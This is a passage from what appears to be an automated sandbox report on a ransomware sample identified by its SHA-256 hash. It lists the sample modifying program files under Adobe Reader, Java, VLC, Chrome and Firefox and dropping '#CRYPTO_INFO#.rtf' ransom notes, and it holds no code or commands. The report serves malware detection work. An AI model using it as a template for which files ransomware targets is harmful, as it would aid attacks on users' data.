DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.felix.gogo.runtime_0.10.0.v201209301036.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\share_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_delete_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoCanary.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\he.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\kinit.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\StartOptimize.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\dd_arrow_small.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\WelcomeCardRdr-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-ja_jp.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-hover_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\move.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\localedata.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jstack.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Viewer.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\editpdf.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_field_grabber.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-3x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\README.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\export.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for 